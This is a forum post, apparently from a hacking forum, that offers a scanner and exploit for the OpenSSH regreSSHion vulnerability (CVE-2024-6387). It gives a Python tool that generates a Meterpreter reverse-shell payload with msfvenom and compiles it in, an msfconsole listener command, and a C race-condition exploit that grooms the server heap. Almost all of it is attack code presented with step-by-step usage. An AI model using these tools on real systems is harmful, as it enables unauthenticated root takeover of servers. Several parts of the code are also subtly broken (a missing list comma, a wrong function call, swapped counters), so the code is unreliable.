Dark
Owner
- Joined
- Mar 21, 2024
- Messages
- 40
CVE-2024-6387 - RegreSSHion - OpenSSH Unauthenticated RCE
A high-severity remote code execution (RCE) vulnerability has been found in OpenSSH's server (CVE-2024-6387) by the research team of Qualys.
Vulnerable & Patched versions is available in source code.
Update Notes on PoC ->
1. This PoC is available only for 32-bit OpenSSH Servers
2. I forgot to share 7etsuo-regreSSHion.c which is used in line 297, 304, 307, 312, 314 and causes errors.
7etsuo-regreSSHion.c added under Python code.
First-time exploiting steps:
1.
2. For example:
PoC/Exploit:
A high-severity remote code execution (RCE) vulnerability has been found in OpenSSH's server (CVE-2024-6387) by the research team of Qualys.
Vulnerable & Patched versions is available in source code.
Update Notes on PoC ->
1. This PoC is available only for 32-bit OpenSSH Servers
2. I forgot to share 7etsuo-regreSSHion.c which is used in line 297, 304, 307, 312, 314 and causes errors.
7etsuo-regreSSHion.c added under Python code.
First-time exploiting steps:
1.
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST {yourip}; set LPORT 9999; exploit -j"2. For example:
python3 CVE-2024-6387.py scan -T example.com -p 22PoC/Exploit:
Python:
#!/usr/bin/env python3
import socket
import argparse
import ipaddress
import threading
from queue import Queue
import csv
import json
import os
import time
import ctypes
class Color:
GREEN = '\033[92m'
RED = '\033[91m'
YELLOW = '\033[93m'
CYAN = '\033[96m'
ORANGE = "\033[33m"
RESET = '\033[0m'
version = "1.0"
# Scan
def resolve_hostname(hostname):
try:
addr_info = socket.getaddrinfo(hostname, None)
addresses = [addr[4][0] for addr in addr_info]
return addresses
except socket.gaierror:
print(f"[-] Hostname could not be resolved: {hostname}")
return []
# Initialize Socket Connection
def create_socket(ip, port, timeout):
try:
family = socket.AF_INET6 if ':' in ip else socket.AF_INET
sock = socket.socket(family, socket.SOCK_STREAM)
sock.settimeout(timeout)
sockconn = (ip,port)
sock.connect((sockconn))
return sock
except Exception:
return None
# Grabs SSH_Banner
def get_ssh_banner(sock, use_help_request):
try:
banner = sock.recv(1024).decode(errors='ignore').strip()
if banner or not use_help_request:
return banner
helpstr = "HELP\n"
sock.sendall(helpstr.encode())
banner = sock.recv(1024).decode(errors='ignore').strip()
return banner
except Exception as e:
return str(e)
finally:
sock.close()
# Initiate Vulnerability Scan
def check_vulnerability(ip, port, timeout, gracetimecheck, result_queue):
sshsock = create_socket(ip, port, timeout)
if not sshsock:
result_queue.put((ip,port,'closed',"Port closed"))
return
banner = (get_ssh_banner(sshsock,use_help_request=None))
if not banner:
result_queue.put((ip,port,'failed',f"(Failed to grab the SSH-Banner: {banner})"))
return
elif not (banner.split('-')[2]).startswith("OpenSSH"):
result_queue.put((ip,port,'unknown',f"(banner: {banner})"))
return
vulnerable_versions = [
'OpenSSH_1.2.2p1',
'OpenSSH_1.2.3p1',
'OpenSSH_2.1.1p2',
'OpenSSH_2.1.1p3',
'OpenSSH_2.0.0p1',
'OpenSSH_2.3.0p1',
'OpenSSH_2.5.1p1',
'OpenSSH_2.5.1p2',
'OpenSSH_2.5.2p2',
'OpenSSH_2.9',
'OpenSSH_2.9p1',
'OpenSSH_2.9.9',
'OpenSSH_2.9.9p1',
'OpenSSH_2.9p2',
'OpenSSH_3.0',
'OpenSSH_3.0p1',
'OpenSSH_3.0.1',
'OpenSSH_3.0.1p1',
'OpenSSH_3.0.2p1',
'OpenSSH_3.1',
'OpenSSH_3.1p1',
'OpenSSH_3.2.2',
'OpenSSH_3.2.2p1',
'OpenSSH_3.2.3',
'OpenSSH_3.2.3p1',
'OpenSSH_3.3',
'OpenSSH_3.3p1',
'OpenSSH_3.4',
'OpenSSH_3.4p1',
'OpenSSH_3.5',
'OpenSSH_3.5p1',
'OpenSSH_3.6',
'OpenSSH_3.6p1',
'OpenSSH_3.6.1',
'OpenSSH_3.6.1p1',
'OpenSSH_3.6.1p2',
'OpenSSH_3.7',
'OpenSSH_3.7p1',
'OpenSSH_3.7.1',
'OpenSSH_3.7.1p1',
'OpenSSH_3.7.1p2',
'OpenSSH_3.8',
'OpenSSH_3.8p1',
'OpenSSH_3.8.1',
'OpenSSH_3.8.1p1',
'OpenSSH_3.9',
'OpenSSH_3.9p1',
'OpenSSH_4.0',
'OpenSSH_4.1',
'OpenSSH_4.2',
'OpenSSH_4.2p1',
'OpenSSH_4.3',
'OpenSSH_4.3p1',
'OpenSSH_4.3p2',
'OpenSSH_4.4',
'OpenSSH_4.4p1',
'OpenSSH_8.5',
'OpenSSH_8.5p1',
'OpenSSH_8.6',
'OpenSSH_8.6p1',
'OpenSSH_8.7',
'OpenSSH_8.7p1',
'OpenSSH_8.8',
'OpenSSH_8.8p1',
'OpenSSH_8.9',
'OpenSSH_8.91',
'OpenSSH_9.0',
'OpenSSH_9.0p1',
'OpenSSH_9.1',
'OpenSSH_9.1p1',
'OpenSSH_9.2',
'OpenSSH_9.2p1',
'OpenSSH_9.3',
'OpenSSH_9.3p1',
'OpenSSH_9.4',
'OpenSSH_9.4p1',
'OpenSSH_9.5',
'OpenSSH_9.5p1',
'OpenSSH_9.6',
'OpenSSH_9.6p1',
'OpenSSH_9.7'
'OpenSSH_9.7p1'
]
patched_versions = [
'OpenSSH_8.9p1 Ubuntu-3ubuntu0.10',
'OpenSSH_9.3p1 Ubuntu-3ubuntu3.6',
'OpenSSH_9.6p1 Ubuntu-3ubuntu13.3',
'OpenSSH_9.3p1 Ubuntu-1ubuntu3.6',
'OpenSSH_9.2p1 Debian-2+deb12u3',
'OpenSSH_8.4p1 Debian-5+deb11u3',
'OpenSSH_9.7p1 Debian-7'
]
finalbanner = (banner.split('-')[2]).split(' ')[0]
distroversion = banner.split('-')[2]+(banner.split('-')[3])
if any(version in finalbanner for version in vulnerable_versions) and distroversion not in patched_versions:
if gracetimecheck:
time.sleep(gracetimecheck)
sshsock = create_socket(ip, port, timeout)
if sshsock:
banner_after_wait = get_ssh_banner(sshsock)
if banner == banner_after_wait:
result_queue.put((ip, port, 'vulnerable', f"(running {banner}) with LoginGraceTime mitigation detected (session stayed open for {gracetimecheck} seconds)"))
else:
result_queue.put((ip, port, 'vulnerable', f"(running {banner})"))
else:
result_queue.put((ip, port, 'vulnerable', f"(running {banner})"))
else:
result_queue.put((ip, port, 'vulnerable', f"(running {banner})"))
else:
result_queue.put((ip, port, 'not_vulnerable', f"(running {banner})"))
# Initiate Port Scan
def scan_ports(targets, port, timeout, gracetimecheck, output_format=None, output_file=None,):
"""Scan ports on multiple targets and optionally write results to a file."""
ips = []
for target in targets:
try:
with open(target, 'r') as file:
ips.extend(file.readlines())
except IOError:
if '/' in target:
try:
network = ipaddress.ip_network(target, strict=False)
ips.extend([str(ip) for ip in network.hosts()])
except ValueError:
print(f"{Color.RED}[-] Invalid: {target}{Color.RESET}")
else:
ips.append(target.strip())
result_queue = Queue()
threads = []
for ip in ips:
ip = ip.strip()
thread = threading.Thread(target=check_vulnerability, args=(ip, port, timeout, gracetimecheck, result_queue ))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
total_scanned = len(ips)
closed_ports = 0
unknown = []
not_vulnerable = []
vulnerable = []
while not result_queue.empty():
ip, port, status, message = result_queue.get()
if status == 'closed':
closed_ports += 1
elif status == 'unknown':
unknown.append((ip, message))
elif status == 'vulnerable':
vulnerable.append((ip, message))
elif status == 'not_vulnerable':
not_vulnerable.append((ip, message))
else:
print(f"{Color.YELLOW}[!] Server at {ip}:{port} {message}{Color.RESET}")
print(f"\n🚨Servers likely vulnerable: {len(vulnerable)}")
for ip, msg in vulnerable:
print(f" [+] Server at {Color.RED}{ip}:{port}{Color.RESET} {msg}")
print(f"\n🛡️ Servers not vulnerable: {len(not_vulnerable)}")
for ip, msg in not_vulnerable:
print(f" [+] Server at {Color.GREEN}{ip}:{port}{Color.RESET} {msg}")
print(f"\n⚠️ Servers with unknown SSH version: {len(unknown)}")
for ip, msg in unknown:
print(f" [+] Server at {Color.ORANGE}{ip}:{port}{Color.RESET} {msg}")
print(f"\n{Color.CYAN}Summary{Color.RESET}:")
print(f"\n📊 Total scanned hosts: {total_scanned}")
print(f"\n🚨 {Color.RED}Total vulnerable hosts: {len(vulnerable)}{Color.RESET}")
print(f"\n🛡️ {Color.GREEN} Total not vulnerable hosts: {len(unknown)}{Color.RESET}")
print(f"\n⚠️ {Color.ORANGE} Total unknown hosts: {len(not_vulnerable)}{Color.RESET}")
print(f"\n🔒 Servers with port {port} closed: {closed_ports}")
if output_format and output_file:
if output_format == 'csv':
with open(output_file, 'w', newline='') as csvfile:
csv_writer = csv.writer(csvfile)
csv_writer.writerow(['IP', 'Status', 'Message'])
for ip, msg in not_vulnerable:
csv_writer.writerow([ip, '[-] No vulnerable server found', msg])
for ip, msg in vulnerable:
csv_writer.writerow([ip, '[+] Vulnerable server found', msg])
csvfile.flush()
print(f"\n{Color.CYAN}✅ Results saved to {output_file} in CSV format.{Color.RESET}")
elif output_format == 'txt':
with open(output_file, 'w') as txtfile:
txtfile.write(f"No vulnerable server found: {len(not_vulnerable)}\n")
for ip, msg in not_vulnerable:
txtfile.write(f" [+] No vulnerable server found at {ip} {msg}\n")
txtfile.write(f"\nVunerable server found: {len(vulnerable)}\n")
for ip, msg in vulnerable:
txtfile.write(f" [+] Vulnerable server found at {ip} {msg}\n")
print(f"\n{Color.CYAN}✅ Results saved to {output_file} in TXT format.{Color.RESET}")
elif output_format == 'json':
output_dict = {
'[-] No vulnerable server found': [{ip: msg} for ip, msg in not_vulnerable],
'[+] Vulnerable server found': [{ip: msg} for ip, msg in vulnerable]
}
with open(output_file, 'w') as jsonfile:
json.dump(output_dict, jsonfile, indent=4)
print(f"\n{Color.CYAN}✅ Results saved to {output_file} in JSON format.{Color.RESET}")
# Create Exploit
def create_exploit(nic):
print(f"{Color.GREEN}[+] Creating exploit...{Color.RESET}")
ip = os.popen(f'ip addr show {nic}').read().split("inet ")[1].split("/")[0]
cmd1 = 'cp 7etsuo-regreSSHion.c 7etsuo-regreSSHion-ex.c'
os.system(cmd1)
os.sync()
#msfvenom is required when creating the exploit / You can use a different script here to initiate your code
cmd2 = (f'msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={ip} LPORT=9999 -f c -v shellcode')
output = (os.popen(cmd2).read())
with open('7etsuo-regreSSHion-ex.c', 'r') as file:
data = file.readlines()
data[49] = f'{output}\n'
with open('7etsuo-regreSSHion-ex.c', 'w') as file:
file.writelines(data)
print()
file.close()
cmd3 = (f'gcc -shared -o exploit.so -fPIC 7etsuo-regreSSHion-ex.c')
os.system(cmd3)
os.remove('7etsuo-regreSSHion-ex.c')
def exploit_vulnerability(targets, port, nic):
"""Exploit vulnerability on vulnerable servers."""
print(f"{Color.GREEN}Exploiting vulnerabilities...{Color.RESET}")
targets = ','.join(targets)
# Create the exploit
create_exploit(nic)
# Call the C function
if os.path.isfile('exploit.so'):
lib = ctypes.CDLL('./exploit.so')
lib.exploit_vulnerability.argtypes = [ctypes.c_char_p, ctypes.c_int]
lib.exploit_vulnerability.restype = ctypes.c_int
result = lib.exploit_vulnerability(targets.encode(), port)
if result == 0:
print("Exploitation successful!")
else:
print("Exploitation failed.")
else:
print("Cannot initiate exploitation, due to exploit.so no created! Please create exploit.so first!")
def initiate_exploit():
print("Trying to exploit CVE-2024-6387...")
def main():
banner = rf"""{Color.GREEN}
________ ______________________ _______
___ __ \_____ _______ ______________ __ ___/__ ___/___ / / /___(_)______ _______
__ /_/ /_ _ \__ __ `/__ ___/_ _ \_____ \ _____ \ __ /_/ / __ / _ __ \__ __ \
_ _, _/ / __/_ /_/ / _ / / __/____/ / ____/ / _ __ / _ / / /_/ /_ / / /
/_/ |_| \___/ _\__, / /_/ \___/ /____/ /____/ /_/ /_/ /_/ \____/ /_/ /_/
/____/
ReggreSSHion CVE-2024-6387 Vulnerability Checker / Exploiter
{version} - Optimized by @Kz, remastered by Dark
{Color.RESET}"""
parser = argparse.ArgumentParser(description="Allows to scan for the RegreSSHion (CVE-2024-6387) vulnerability and perform exploitation.",
epilog='Example usage: CVE-2024-6387.py -s <targets> -p <port> -t <timeout> -o <csv/txt/json> -f <output-file>')
print(banner)
parser.add_argument("mode", nargs='?', choices=['scan','exploit'], help="Selecting the method by user choice. Create: Creates exploit.so Scan: Scans for vulnerability Exploit: Exploits vulnerability")
parser.add_argument("-T","--targets", nargs='+', help="IP addresses, domain names, file paths containing IP addresses, or CIDR network ranges.")
parser.add_argument("-f", "--outputfile", help="File to save results to. (e.q: result.json)")
parser.add_argument("-g", "--gracetimecheck", nargs='?', const=120, type=int, help="Time in seconds to wait after identifying the version to check for LoginGraceTime mitigation (default: 120 seconds).")
parser.add_argument("-n", "--nic", default='eth0', help="Your Network NIC")
parser.add_argument("-o", "--output", choices=['csv', 'txt', 'json'], help="Output format for results.")
parser.add_argument("-p", "--port", type=int, default=22, help="Port number to check or exploit (default: 22).")
parser.add_argument("-s", "--speed", type=int, default=10, help="Number of threads to increase race condition chances")
parser.add_argument("-t", "--timeout", type=float, default=1.0, help="Connection timeout in seconds (default: 1 second).")
#Initialize Parser and assign variable to parsed arguments
args = parser.parse_args()
mode = args.mode
targets = args.targets
port = args.port
timeout = args.timeout
nic = args.nic
gracetimecheck = args.gracetimecheck
#determine the mode that is used scan or exploit
if mode == 'scan':
if args.targets is not None:
output_format = args.output if args.output else None
output_file = args.outputfile if args.outputfile else None
scan_ports(targets, port, timeout, gracetimecheck, output_format, output_file)
else:
print("Please specify --targets (-T) in order to use this command")
elif mode == 'exploit':
if args.targets and args.nic is not None:
exploit_vulnerability(targets,port,nic)
else:
print("Please specify both --targets (-T) and --nic (-n) in order to use this command")
else:
print("Please specify either scan or exploit option. \n")
print(f"Example: CVE-2024-6387.py scan <targets> -p <port>")
if __name__ == "__main__":
main()
C:
/** 7etsuo-regreSSHion.c
* -------------------------------------------------------------------------
* SSH-2.0-OpenSSH_9.2p1 Exploit
* -------------------------------------------------------------------------
*
* Exploit Title : SSH Exploit for CVE-2024-6387 (regreSSHion)
* Author : 7etsuo
* Date : 2024-07-01
*
* Description:
* Targets a signal handler race condition in OpenSSH's
* server (sshd) on glibc-based Linux systems. It exploits a vulnerability
* where the SIGALRM handler calls async-signal-unsafe functions, leading
* to rce as root.
*
* Notes:
* 1. Shellcode : Replace placeholder with actual payload.
* 2. GLIBC_BASES : Needs adjustment for specific target systems.
* 3. Timing parameters: Fine-tune based on target system responsiveness.
* 4. Heap layout : Requires tweaking for different OpenSSH versions.
* 5. File structure offsets: Verify for the specific glibc version.
* -------------------------------------------------------------------------
*/
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <string.h>
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <time.h>
#define MAX_PACKET_SIZE (256 * 1024)
#define LOGIN_GRACE_TIME 120
#define MAX_STARTUPS 100
#define CHUNK_ALIGN(s) (((s) + 15) & ~15)
// Possible glibc base addresses (for ASLR bypass)
uint64_t GLIBC_BASES[] = { 0xb7200000, 0xb7400000 };
int NUM_GLIBC_BASES = sizeof(GLIBC_BASES) / sizeof(GLIBC_BASES[0]);
// Shellcode placeholder (replace with actual shellcode)
unsigned char shellcode[] = "\x90\x90\x90\x90";
int setup_connection(const char *ip, int port);
void send_packet(int sock, unsigned char packet_type,
const unsigned char *data, size_t len);
void prepare_heap(int sock);
void time_final_packet(int sock, double *parsing_time);
int attempt_race_condition(int sock, double parsing_time,
uint64_t glibc_base);
double measure_response_time(int sock, int error_type);
void create_public_key_packet(unsigned char *packet, size_t size,
uint64_t glibc_base);
void create_fake_file_structure(unsigned char *data, size_t size,
uint64_t glibc_base);
void send_ssh_version(int sock);
int receive_ssh_version(int sock);
void send_kex_init(int sock);
int receive_kex_init(int sock);
int perform_ssh_handshake(int sock);
int exploit_vulnerability(const char *targets, int port) {
double parsing_time = 0;
int success = 0;
srand(time(NULL));
// Attempt exploitation for each possible glibc base address
for (int base_idx = 0; base_idx < NUM_GLIBC_BASES && !success; base_idx++) {
uint64_t glibc_base = GLIBC_BASES[base_idx];
printf("Attempting exploitation with glibc base: 0x%lx\n", glibc_base);
// The advisory mentions "~10,000 tries on average"
for (int attempt = 0; attempt < 20000 && !success; attempt++) {
if (attempt % 1000 == 0) {
printf("Attempt %d of 20000\n", attempt);
}
int sock = setup_connection(targets, port);
if (sock < 0) {
fprintf(stderr, "Failed to establish connection, attempt %d\n", attempt);
continue;
}
if (perform_ssh_handshake(sock) < 0) {
fprintf(stderr, "SSH handshake failed, attempt %d\n", attempt);
close(sock);
continue;
}
prepare_heap(sock);
time_final_packet(sock, &parsing_time);
if (attempt_race_condition(sock, parsing_time, glibc_base)) {
printf("Possible exploitation success on attempt %d with glibc base 0x%lx!\n",
attempt, glibc_base);
success = 1;
break;
}
close(sock);
usleep(100000); // 100ms delay between attempts, as mentioned in the advisory
}
}
return !success;
}
int main(int argc, char *argv[]) {
if (argc != 3) {
fprintf(stderr, "Usage: %s <ip> <port>\n", argv[0]);
exit(1);
}
const char *ip = argv[1];
int port = atoi(argv[2]);
return exploit_vulnerability(ip, port);
}
int setup_connection (const char *ip, int port){
int sock = socket (AF_INET, SOCK_STREAM, 0);
if (sock < 0)
{
perror ("socket");
return -1;
}
struct sockaddr_in server_addr;
memset (&server_addr, 0, sizeof (server_addr));
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons (port);
if (inet_pton (AF_INET, ip, &server_addr.sin_addr) <= 0)
{
perror ("inet_pton");
close (sock);
return -1;
}
if (connect (sock, (struct sockaddr *)&server_addr, sizeof (server_addr))
< 0)
{
perror ("connect");
close (sock);
return -1;
}
// Set socket to non-blocking mode
int flags = fcntl (sock, F_GETFL, 0);
fcntl (sock, F_SETFL, flags | O_NONBLOCK);
return sock;
}
void
send_packet (int sock, unsigned char packet_type, const unsigned char *data,
size_t len)
{
unsigned char packet[MAX_PACKET_SIZE];
size_t packet_len = len + 5;
packet[0] = (packet_len >> 24) & 0xFF;
packet[1] = (packet_len >> 16) & 0xFF;
packet[2] = (packet_len >> 8) & 0xFF;
packet[3] = packet_len & 0xFF;
packet[4] = packet_type;
memcpy (packet + 5, data, len);
if (send (sock, packet, packet_len, 0) < 0)
{
perror ("send_packet");
}
}
void
send_ssh_version (int sock)
{
const char *ssh_version = "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1\r\n";
if (send (sock, ssh_version, strlen (ssh_version), 0) < 0)
{
perror ("send ssh version");
}
}
int
receive_ssh_version (int sock)
{
char buffer[256];
ssize_t received;
do
{
received = recv (sock, buffer, sizeof (buffer) - 1, 0);
}
while (received < 0 && (errno == EWOULDBLOCK || errno == EAGAIN));
if (received > 0)
{
buffer[received] = '\0';
printf ("Received SSH version: %s", buffer);
return 0;
}
else if (received == 0)
{
fprintf (stderr, "Connection closed while receiving SSH version\n");
}
else
{
perror ("receive ssh version");
}
return -1;
}
void
send_kex_init (int sock)
{
unsigned char kexinit_payload[36] = { 0 };
send_packet (sock, 20, kexinit_payload, sizeof (kexinit_payload));
}
int
receive_kex_init (int sock)
{
unsigned char buffer[1024];
ssize_t received;
do
{
received = recv (sock, buffer, sizeof (buffer), 0);
}
while (received < 0 && (errno == EWOULDBLOCK || errno == EAGAIN));
if (received > 0)
{
printf ("Received KEX_INIT (%zd bytes)\n", received);
return 0;
}
else if (received == 0)
{
fprintf (stderr, "Connection closed while receiving KEX_INIT\n");
}
else
{
perror ("receive kex init");
}
return -1;
}
int
perform_ssh_handshake (int sock)
{
send_ssh_version (sock);
if (receive_ssh_version (sock) < 0)
return -1;
send_kex_init (sock);
if (receive_kex_init (sock) < 0)
return -1;
return 0;
}
void
prepare_heap (int sock)
{
// Packet a: Allocate and free tcache chunks
for (int i = 0; i < 10; i++)
{
unsigned char tcache_chunk[64];
memset (tcache_chunk, 'A', sizeof (tcache_chunk));
send_packet (sock, 5, tcache_chunk, sizeof (tcache_chunk));
// These will be freed by the server, populating tcache
}
// Packet b: Create 27 pairs of large (~8KB) and small (320B) holes
for (int i = 0; i < 27; i++)
{
// Allocate large chunk (~8KB)
unsigned char large_hole[8192];
memset (large_hole, 'B', sizeof (large_hole));
send_packet (sock, 5, large_hole, sizeof (large_hole));
// Allocate small chunk (320B)
unsigned char small_hole[320];
memset (small_hole, 'C', sizeof (small_hole));
send_packet (sock, 5, small_hole, sizeof (small_hole));
}
// Packet c: Write fake headers, footers, vtable and _codecvt pointers
for (int i = 0; i < 27; i++)
{
unsigned char fake_data[4096];
create_fake_file_structure (fake_data, sizeof (fake_data),
GLIBC_BASES[0]);
send_packet (sock, 5, fake_data, sizeof (fake_data));
}
// Packet d: Ensure holes are in correct malloc bins (send ~256KB string)
unsigned char large_string[MAX_PACKET_SIZE - 1];
memset (large_string, 'E', sizeof (large_string));
send_packet (sock, 5, large_string, sizeof (large_string));
}
void
create_fake_file_structure (unsigned char *data, size_t size,
uint64_t glibc_base)
{
memset (data, 0, size);
struct
{
void *_IO_read_ptr;
void *_IO_read_end;
void *_IO_read_base;
void *_IO_write_base;
void *_IO_write_ptr;
void *_IO_write_end;
void *_IO_buf_base;
void *_IO_buf_end;
void *_IO_save_base;
void *_IO_backup_base;
void *_IO_save_end;
void *_markers;
void *_chain;
int _fileno;
int _flags;
int _mode;
char _unused2[40];
void *_vtable_offset;
} *fake_file = (void *)data;
// Set _vtable_offset to 0x61 as described in the advisory
fake_file->_vtable_offset = (void *)0x61;
// Set up fake vtable and _codecvt pointers
*(uint64_t *)(data + size - 16)
= glibc_base + 0x21b740; // fake vtable (_IO_wfile_jumps)
*(uint64_t *)(data + size - 8) = glibc_base + 0x21d7f8; // fake _codecvt
}
void
time_final_packet (int sock, double *parsing_time)
{
double time_before = measure_response_time (sock, 1);
double time_after = measure_response_time (sock, 2);
*parsing_time = time_after - time_before;
printf ("Estimated parsing time: %.6f seconds\n", *parsing_time);
}
double
measure_response_time (int sock, int error_type)
{
unsigned char error_packet[1024];
size_t packet_size;
if (error_type == 1)
{
// Error before sshkey_from_blob
packet_size = snprintf ((char *)error_packet, sizeof (error_packet),
"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3");
}
else
{
// Error after sshkey_from_blob
packet_size = snprintf ((char *)error_packet, sizeof (error_packet),
"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAQQDZy9");
}
struct timespec start, end;
clock_gettime (CLOCK_MONOTONIC, &start);
send_packet (sock, 50, error_packet,
packet_size); // SSH_MSG_USERAUTH_REQUEST
char response[1024];
ssize_t received;
do
{
received = recv (sock, response, sizeof (response), 0);
}
while (received < 0 && (errno == EWOULDBLOCK || errno == EAGAIN));
clock_gettime (CLOCK_MONOTONIC, &end);
double elapsed
= (end.tv_sec - start.tv_sec) + (end.tv_nsec - start.tv_nsec) / 1e9;
return elapsed;
}
void
create_public_key_packet (unsigned char *packet, size_t size,
uint64_t glibc_base)
{
memset (packet, 0, size);
size_t offset = 0;
for (int i = 0; i < 27; i++)
{
// malloc(~4KB) - This is for the large hole
*(uint32_t *)(packet + offset) = CHUNK_ALIGN (4096);
offset += CHUNK_ALIGN (4096);
// malloc(304) - This is for the small hole (potential FILE structure)
*(uint32_t *)(packet + offset) = CHUNK_ALIGN (304);
offset += CHUNK_ALIGN (304);
}
// Add necessary headers for the SSH public key format
memcpy (packet, "ssh-rsa ", 8);
// Place shellcode in the heap via previous allocations
memcpy (packet + CHUNK_ALIGN (4096) * 13 + CHUNK_ALIGN (304) * 13, shellcode,
sizeof (shellcode));
// Set up the fake FILE structures within the packet
for (int i = 0; i < 27; i++)
{
create_fake_file_structure (packet + CHUNK_ALIGN (4096) * (i + 1)
+ CHUNK_ALIGN (304) * i,
CHUNK_ALIGN (304), glibc_base);
}
}
int
attempt_race_condition (int sock, double parsing_time, uint64_t glibc_base)
{
unsigned char final_packet[MAX_PACKET_SIZE];
create_public_key_packet (final_packet, sizeof (final_packet), glibc_base);
// Send all but the last byte
if (send (sock, final_packet, sizeof (final_packet) - 1, 0) < 0)
{
perror ("send final packet");
return 0;
}
// Precise timing for last byte
struct timespec start, current;
clock_gettime (CLOCK_MONOTONIC, &start);
while (1)
{
clock_gettime (CLOCK_MONOTONIC, ¤t);
double elapsed = (current.tv_sec - start.tv_sec)
+ (current.tv_nsec - start.tv_nsec) / 1e9;
if (elapsed >= (LOGIN_GRACE_TIME - parsing_time - 0.001))
{ // 1ms before SIGALRM
if (send (sock, &final_packet[sizeof (final_packet) - 1], 1, 0) < 0)
{
perror ("send last byte");
return 0;
}
break;
}
}
// Check for successful exploitation
char response[1024];
ssize_t received = recv (sock, response, sizeof (response), 0);
if (received > 0)
{
printf ("Received response after exploit attempt (%zd bytes)\n",
received);
// Analyze response to determine if we hit the "large" race window
if (memcmp (response, "SSH-2.0-", 8) != 0)
{
printf ("Possible hit on 'large' race window\n");
return 1;
}
}
else if (received == 0)
{
printf (
"Connection closed by server - possible successful exploitation\n");
return 1;
}
else if (errno == EWOULDBLOCK || errno == EAGAIN)
{
printf ("No immediate response from server - possible successful "
"exploitation\n");
return 1;
}
else
{
perror ("recv");
}
return 0;
}
int
perform_exploit (const char *ip, int port)
{
int success = 0;
double parsing_time = 0;
double timing_adjustment = 0;
for (int base_idx = 0; base_idx < NUM_GLIBC_BASES && !success; base_idx++)
{
uint64_t glibc_base = GLIBC_BASES[base_idx];
printf ("Attempting exploitation with glibc base: 0x%lx\n", glibc_base);
for (int attempt = 0; attempt < 10000 && !success; attempt++)
{
if (attempt % 1000 == 0)
{
printf ("Attempt %d of 10000\n", attempt);
}
int sock = setup_connection (ip, port);
if (sock < 0)
{
fprintf (stderr, "Failed to establish connection, attempt %d\n",
attempt);
continue;
}
if (perform_ssh_handshake (sock) < 0)
{
fprintf (stderr, "SSH handshake failed, attempt %d\n", attempt);
close (sock);
continue;
}
prepare_heap (sock);
time_final_packet (sock, &parsing_time);
// Implement feedback-based timing strategy
parsing_time += timing_adjustment;
if (attempt_race_condition (sock, parsing_time, glibc_base))
{
printf ("Possible exploitation success on attempt %d with glibc "
"base 0x%lx!\n",
attempt, glibc_base);
success = 1;
// In a real exploit, we would now attempt to interact with the
// shell
}
else
{
// Adjust timing based on feedback
timing_adjustment += 0.00001; // Small incremental adjustment
}
close (sock);
usleep (100000); // 100ms delay between attempts, as mentioned in the
// advisory
}
}
return success;
}
Last edited: